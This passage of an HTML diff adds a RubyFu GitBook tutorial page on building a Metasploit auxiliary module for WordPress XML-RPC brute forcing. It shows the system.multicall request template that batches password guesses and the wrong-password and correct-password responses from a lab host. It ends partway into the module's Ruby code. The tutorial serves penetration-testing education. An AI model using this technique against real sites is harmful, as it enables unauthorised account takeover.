+ <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
875
+
876
+
877
+ <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
878
+
879
+ <i class="fa fa-check"></i>
880
+
881
+ <b>5.1.</b>
882
+
883
+ Fuzzer
884
+ </a>
885
+
886
+
887
+ </li>
888
+
889
+ <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
890
+
891
+
892
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
893
+
894
+ <i class="fa fa-check"></i>
895
+
896
+ <b>5.2.</b>
897
+
898
+ Metasploit
899
+ </a>
900
+
901
+
902
+ <ul class="articles">
903
+
904
+
905
+ <li class="chapter active" data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
906
+
907
+
908
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
909
+
910
+ <i class="fa fa-check"></i>
911
+
912
+ <b>5.2.1.</b>
913
+
914
+ Auxiliary module
915
+ </a>
916
+
917
+
918
+ </li>
919
+
920
+ <li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
921
+
922
+
923
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
924
+
925
+ <i class="fa fa-check"></i>
926
+
927
+ <b>5.2.2.</b>
928
+
929
+ Exploit module
930
+ </a>
931
+
932
+
933
+ </li>
934
+
935
+ <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
936
+
937
+
938
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
939
+
940
+ <i class="fa fa-check"></i>
941
+
942
+ <b>5.2.3.</b>
943
+
944
+ Meterpreter
945
+ </a>
946
+
947
+
948
+ <ul class="articles">
949
+
950
+
951
+ <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
952
+
953
+
954
+ <a href="../module_0x5__exploitation_kung_fu/extensions.html">
955
+
956
+ <i class="fa fa-check"></i>
957
+
958
+ <b>5.2.3.1.</b>
959
+
960
+ API and Extensions
961
+ </a>
962
+
963
+
964
+ </li>
965
+
966
+ <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
967
+
968
+
969
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
970
+
971
+ <i class="fa fa-check"></i>
972
+
973
+ <b>5.2.3.2.</b>
974
+
975
+ Meterpreter Scripting
976
+ </a>
977
+
978
+
979
+ </li>
980
+
981
+ <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
982
+
983
+
984
+ <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
985
+
986
+ <i class="fa fa-check"></i>
987
+
988
+ <b>5.2.3.3.</b>
989
+
990
+ Railgun API Extension
991
+ </a>
992
+
993
+
994
+ </li>
995
+
996
+
997
+ </ul>
998
+
999
+ </li>
1000
+
1001
+
1002
+ </ul>
1003
+
1004
+ </li>
1005
+
1006
+ <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
1007
+
1008
+
1009
+ <a href="../module_0x5__exploitation_kung_fu/metasm.html">
1010
+
1011
+ <i class="fa fa-check"></i>
1012
+
1013
+ <b>5.3.</b>
1014
+
1015
+ metasm
1016
+ </a>
1017
+
1018
+
1019
+ </li>
1020
+
1021
+
1022
+ </ul>
1023
+
1024
+ </li>
1025
+
1026
+ <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
1027
+
1028
+
1029
+ <a href="../module_0x6__forensic/index.html">
1030
+
1031
+ <i class="fa fa-check"></i>
1032
+
1033
+ <b>6.</b>
1034
+
1035
+ Module 0x6 | Forensic Kung Fu
1036
+ </a>
1037
+
1038
+
1039
+ <ul class="articles">
1040
+
1041
+
1042
+ <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
1043
+
1044
+
1045
+ <a href="../module_0x6__forensic/windows_forensic.html">
1046
+
1047
+ <i class="fa fa-check"></i>
1048
+
1049
+ <b>6.1.</b>
1050
+
1051
+ Windows Forensic
1052
+ </a>
1053
+
1054
+
1055
+ </li>
1056
+
1057
+ <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
1058
+
1059
+
1060
+ <a href="../module_0x6__forensic/android_forensic.html">
1061
+
1062
+ <i class="fa fa-check"></i>
1063
+
1064
+ <b>6.2.</b>
1065
+
1066
+ Android Forensic
1067
+ </a>
1068
+
1069
+
1070
+ </li>
1071
+
1072
+ <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
1073
+
1074
+
1075
+ <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
1076
+
1077
+ <i class="fa fa-check"></i>
1078
+
1079
+ <b>6.3.</b>
1080
+
1081
+ Network Traffic Analysis
1082
+ </a>
1083
+
1084
+
1085
+ </li>
1086
+
1087
+ <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
1088
+
1089
+
1090
+ <a href="../module_0x6__forensic/parsing_log_files.html">
1091
+
1092
+ <i class="fa fa-check"></i>
1093
+
1094
+ <b>6.4.</b>
1095
+
1096
+ Parsing Log Files
1097
+ </a>
1098
+
1099
+
1100
+ </li>
1101
+
1102
+
1103
+ </ul>
1104
+
1105
+ </li>
1106
+
1107
+ <li class="chapter " data-level="7" data-path="references/index.html">
1108
+
1109
+
1110
+ <a href="../references/index.html">
1111
+
1112
+ <i class="fa fa-check"></i>
1113
+
1114
+ <b>7.</b>
1115
+
1116
+ References
1117
+ </a>
1118
+
1119
+
1120
+ </li>
1121
+
1122
+ <li class="chapter " data-level="8" data-path="faqs/index.html">
1123
+
1124
+
1125
+ <a href="../faqs/index.html">
1126
+
1127
+ <i class="fa fa-check"></i>
1128
+
1129
+ <b>8.</b>
1130
+
1131
+ FAQs
1132
+ </a>
1133
+
1134
+
1135
+ </li>
1136
+
1137
+ <li class="chapter " data-level="9" data-path="contributors/index.html">
1138
+
1139
+
1140
+ <a href="../contributors/index.html">
1141
+
1142
+ <i class="fa fa-check"></i>
1143
+
1144
+ <b>9.</b>
1145
+
1146
+ Contributors
1147
+ </a>
1148
+
1149
+
1150
+ <ul class="articles">
1151
+
1152
+
1153
+ <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
1154
+
1155
+
1156
+ <a href="../contributors/todo.html">
1157
+
1158
+ <i class="fa fa-check"></i>
1159
+
1160
+ <b>9.1.</b>
1161
+
1162
+ TODO
1163
+ </a>
1164
+
1165
+
1166
+ </li>
1167
+
1168
+
1169
+ </ul>
1170
+
1171
+ </li>
1172
+
1173
+
1174
+
1175
+
1176
+ <li class="divider"></li>
1177
+ <li>
1178
+ <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
1179
+ Published with GitBook
1180
+ </a>
1181
+ </li>
1182
+
1183
+ </ul>
1184
+ </nav>
1185
+ </div>
1186
+
1187
+ <div class="book-body">
1188
+ <div class="body-inner">
1189
+ <div class="book-header" role="navigation">
1190
+ <!-- Actions Left -->
1191
+
1192
+
1193
+ <!-- Title -->
1194
+ <h1>
1195
+ <i class="fa fa-circle-o-notch fa-spin"></i>
1196
+ <a href="../" >RubyFu</a>
1197
+ </h1>
1198
+ </div>
1199
+
1200
+ <div class="page-wrapper" tabindex="-1" role="main">
1201
+ <div class="page-inner">
1202
+
1203
+
1204
+ <section class="normal" id="section-">
1205
+
1206
+ <h1 id="auxiliary-module"><a name="auxiliary-module" class="plugin-anchor" href="#auxiliary-module"><span class="fa fa-link"></span></a>Auxiliary module</h1>
1207
+ <h2 id="scanner"><a name="scanner" class="plugin-anchor" href="#scanner"><span class="fa fa-link"></span></a>Scanner</h2>
1208
+ <p>Basic Scanner modules</p>
1209
+ <h3 id="wordpress-xmlrpc-massive-brute-force"><a name="wordpress-xmlrpc-massive-brute-force" class="plugin-anchor" href="#wordpress-xmlrpc-massive-brute-force"><span class="fa fa-link"></span></a>WordPress XML-RPC Massive Brute Force</h3>
1210
+ <p>WordPress CMS framework support XML-RPC service to interact with almost all functions in the framework. Some functions require authentication. The main issues lies in the you can authenticate many times within the same request. WordPress accepts about 1788 lines of XML request which allows us to send tremendous number of login tries in a single request. So how awesome is this? Let me explain. </p>
1211
+ <p>Imagine that you have to brute force one user with 6000 passwords? How many requests you have to send in the normal brute force technique? It&apos;s 6000 requests. Using our module will need to 4 requests only of you use the default CHUNKSIZE which is 1500 password per request!!!. NO MULTI-THREADING even you use multi-threading in the traditional brute force technique you&apos;ll send 6000 request a few of its are parallel.</p>
1212
+ <pre><code class="lang-xml"><span class="hljs-pi">&lt;?xml version=&quot;1.0&quot;?&gt;</span>
1213
+ <span class="hljs-tag">&lt;<span class="hljs-title">methodCall</span>&gt;</span>
1214
+ <span class="hljs-tag">&lt;<span class="hljs-title">methodName</span>&gt;</span>system.multicall<span class="hljs-tag">&lt;/<span class="hljs-title">methodName</span>&gt;</span>
1215
+ <span class="hljs-tag">&lt;<span class="hljs-title">params</span>&gt;</span>
1216
+ <span class="hljs-tag">&lt;<span class="hljs-title">param</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1217
+
1218
+
1219
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">struct</span>&gt;</span>
1220
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1221
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>methodName<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1222
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>wp.getUsersBlogs<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1223
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1224
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1225
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>params<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1226
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1227
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>&quot;USER #1&quot;<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1228
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>&quot;PASS #1&quot;<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1229
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1230
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1231
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1232
+
1233
+ ...Snippet...
1234
+
1235
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">struct</span>&gt;</span>
1236
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1237
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>methodName<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1238
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>wp.getUsersBlogs<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1239
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1240
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1241
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>params<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1242
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1243
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>&quot;USER #1&quot;<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1244
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>&quot;PASS #N&quot;<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1245
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1246
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1247
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1248
+
1249
+
1250
+ <span class="hljs-tag">&lt;/<span class="hljs-title">params</span>&gt;</span>
1251
+ <span class="hljs-tag">&lt;/<span class="hljs-title">methodCall</span>&gt;</span>
1252
+ </code></pre>
1253
+ <p>So from above you can understand how the XML request will be build. Now How the reply will be?
1254
+ To simplify this we&apos;ll test a single user once with wrong password another with correct password to understand the response behavior </p>
1255
+ <p><strong>wrong password response</strong></p>
1256
+ <pre><code class="lang-xml"><span class="hljs-pi">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span>
1257
+ <span class="hljs-tag">&lt;<span class="hljs-title">methodResponse</span>&gt;</span>
1258
+ <span class="hljs-tag">&lt;<span class="hljs-title">params</span>&gt;</span>
1259
+ <span class="hljs-tag">&lt;<span class="hljs-title">param</span>&gt;</span>
1260
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1261
+ <span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span>
1262
+ <span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1263
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1264
+ <span class="hljs-tag">&lt;<span class="hljs-title">struct</span>&gt;</span>
1265
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1266
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>faultCode<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1267
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1268
+ <span class="hljs-tag">&lt;<span class="hljs-title">int</span>&gt;</span>403<span class="hljs-tag">&lt;/<span class="hljs-title">int</span>&gt;</span>
1269
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1270
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1271
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1272
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>faultString<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1273
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1274
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>Incorrect username or password.<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1275
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1276
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1277
+ <span class="hljs-tag">&lt;/<span class="hljs-title">struct</span>&gt;</span>
1278
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1279
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span>
1280
+ <span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span>
1281
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1282
+ <span class="hljs-tag">&lt;/<span class="hljs-title">param</span>&gt;</span>
1283
+ <span class="hljs-tag">&lt;/<span class="hljs-title">params</span>&gt;</span>
1284
+ <span class="hljs-tag">&lt;/<span class="hljs-title">methodResponse</span>&gt;</span>
1285
+ </code></pre>
1286
+ <p>We noticed the following </p>
1287
+ <ul>
1288
+ <li><code>&lt;name&gt;faultCode&lt;/name&gt;</code></li>
1289
+ <li><code>&lt;int&gt;403&lt;/int&gt;</code></li>
1290
+ <li><code>&lt;string&gt;Incorrect username or password.&lt;/string&gt;</code></li>
1291
+ </ul>
1292
+ <p>Usually we rely one the string response &apos;<em>Incorrect username or password.</em>&apos;, but what if the WordPress language wasn&apos;t English? so the best thing is the integer response which is <code>403</code></p>
1293
+ <p><strong>correct password response</strong></p>
1294
+ <pre><code class="lang-xml"><span class="hljs-pi">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span>
1295
+ <span class="hljs-tag">&lt;<span class="hljs-title">methodResponse</span>&gt;</span>
1296
+ <span class="hljs-tag">&lt;<span class="hljs-title">params</span>&gt;</span>
1297
+ <span class="hljs-tag">&lt;<span class="hljs-title">param</span>&gt;</span>
1298
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1299
+ <span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span>
1300
+ <span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1301
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1302
+ <span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span>
1303
+ <span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1304
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1305
+ <span class="hljs-tag">&lt;<span class="hljs-title">array</span>&gt;</span>
1306
+ <span class="hljs-tag">&lt;<span class="hljs-title">data</span>&gt;</span>
1307
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1308
+ <span class="hljs-tag">&lt;<span class="hljs-title">struct</span>&gt;</span>
1309
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1310
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>isAdmin<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1311
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1312
+ <span class="hljs-tag">&lt;<span class="hljs-title">boolean</span>&gt;</span>1<span class="hljs-tag">&lt;/<span class="hljs-title">boolean</span>&gt;</span>
1313
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1314
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1315
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1316
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>url<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1317
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1318
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>http://172.17.0.3/<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1319
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1320
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1321
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1322
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>blogid<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1323
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1324
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>1<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1325
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1326
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1327
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1328
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>blogName<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1329
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1330
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>Docker wordpress<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1331
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1332
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1333
+ <span class="hljs-tag">&lt;<span class="hljs-title">member</span>&gt;</span>
1334
+ <span class="hljs-tag">&lt;<span class="hljs-title">name</span>&gt;</span>xmlrpc<span class="hljs-tag">&lt;/<span class="hljs-title">name</span>&gt;</span>
1335
+ <span class="hljs-tag">&lt;<span class="hljs-title">value</span>&gt;</span>
1336
+ <span class="hljs-tag">&lt;<span class="hljs-title">string</span>&gt;</span>http://172.17.0.3/xmlrpc.php<span class="hljs-tag">&lt;/<span class="hljs-title">string</span>&gt;</span>
1337
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1338
+ <span class="hljs-tag">&lt;/<span class="hljs-title">member</span>&gt;</span>
1339
+ <span class="hljs-tag">&lt;/<span class="hljs-title">struct</span>&gt;</span>
1340
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1341
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span>
1342
+ <span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span>
1343
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1344
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span>
1345
+ <span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span>
1346
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1347
+ <span class="hljs-tag">&lt;/<span class="hljs-title">data</span>&gt;</span>
1348
+ <span class="hljs-tag">&lt;/<span class="hljs-title">array</span>&gt;</span>
1349
+ <span class="hljs-tag">&lt;/<span class="hljs-title">value</span>&gt;</span>
1350
+ <span class="hljs-tag">&lt;/<span class="hljs-title">param</span>&gt;</span>
1351
+ <span class="hljs-tag">&lt;/<span class="hljs-title">params</span>&gt;</span>
1352
+ <span class="hljs-tag">&lt;/<span class="hljs-title">methodResponse</span>&gt;</span>
1353
+ </code></pre>
1354
+ <p>We noticed that long reply with the result of called method <code>wp.getUsersBlogs</code></p>
1355
+ <p>Awesome, right?</p>
1356
+ <p>The tricky part is just begun! Since we will be sending thousands of passwords in one request and the reply will be rally huge XML files, how we&apos;ll find the position of the correct credentials? The answer is, by using the powerful ruby iteration methods, particularly <code>each_with_index</code> method.</p>
1357
+ <p>Enough talking, show me the code!</p>
1358
+ <h4 id="what-do-we-want"><a name="what-do-we-want" class="plugin-anchor" href="#what-do-we-want"><span class="fa fa-link"></span></a>What do we want?</h4>
1359
+ <ul>
1360
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Create Auxiliary module</li>
1361
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Deal with Web Application </li>
1362
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Deal with WordPress </li>
1363
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Describe The module</li>
1364
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Let people know we created this module</li>
1365
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Add references about the vulnerability that we exploit</li>
1366
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Options to set the target URI, port, user, pass list.</li>
1367
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Read username and password lists as arrays </li>
1368
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Build/Generate XML file takes a user and iterate around the passwords</li>
1369
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if target is running WordPress </li>
1370
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if target enabling RPC</li>
1371
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Setup the HTTP with XML POST request</li>
1372
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Parse XML request and response </li>
1373
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Find the exact correct credentials </li>
1374
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if we got blocked</li>
1375
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Parsing the result and find which password is correct </li>
1376
+ <li style="list-style: none"><input type="checkbox" disabled="disabled"> Check if the module has been written correctly (msftidy.rb)</li>
1377
+ </ul>
1378
+ <h4 id="steps"><a name="steps" class="plugin-anchor" href="#steps"><span class="fa fa-link"></span></a>Steps</h4>
1379
+ <ul>
1380
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Create Auxiliary module</li>
1381
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Deal with Web Application </li>
1382
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Deal with WordPress </li>
1383
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Describe The module</li>
1384
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Let people know we created this module</li>
1385
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Add references about the vulnerability that we exploit</li>
1386
+ <li style="list-style: none"><input type="checkbox" disabled="disabled" checked="checked"> Options to set the target URI, port, user, pass list.</li>
1387
+ </ul>
1388
+ <pre><code class="lang-ruby"><span class="hljs-comment">##</span>
1389
+ <span class="hljs-comment"># This module requires Metasploit: http://www.metasploit.com/download</span>
1390
+ <span class="hljs-comment"># Current source: https://github.com/rapid7/metasploit-framework</span>
1391
+ <span class="hljs-comment">##</span>
1392
+
1393
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;msf/core&apos;</span>
1394
+
1395
+ <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Metasploit3</span> <span class="hljs-inheritance">&lt; <span class="hljs-parent">Msf::Auxiliary</span></span></span>
1396
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HttpClient</span>
1397
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">Msf::Exploit::Remote::HTTP::Wordpress</span>
1398
+
1399
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">initialize</span><span class="hljs-params">(info = {})</span></span>
1400
+ <span class="hljs-keyword">super</span>(update_info(
1401
+ info,
1402
+ <span class="hljs-string">&apos;Name&apos;</span> =&gt; <span class="hljs-string">&apos;WordPress XML-RPC Massive Brute Force&apos;</span>,
1403
+ <span class="hljs-string">&apos;Description&apos;</span> =&gt; <span class="hljs-string">%q{WordPress massive brute force attacks via WordPress XML-RPC service.}</span>,
1404
+ <span class="hljs-string">&apos;License&apos;</span> =&gt; <span class="hljs-constant">MSF_LICENSE</span>,
1405
+ <span class="hljs-string">&apos;Author&apos;</span> =&gt;
1406
+ [
1407
+ <span class="hljs-string">&apos;Sabri (@KINGSABRI)&apos;</span>, <span class="hljs-comment"># Module Writer</span>
1408
+ <span class="hljs-string">&apos;William (WCoppola@Lares.com)&apos;</span> <span class="hljs-comment"># Module Requester</span>
1409
+ ],
1410
+ <span class="hljs-string">&apos;References&apos;</span> =&gt;
1411
+ [
1412
+ [<span class="hljs-string">&apos;URL&apos;</span>, <span class="hljs-string">&apos;https://blog.cloudflare.com/a-look-at-the-new-wordpress-brute-force-amplification-attack/&apos;</span>],
1413
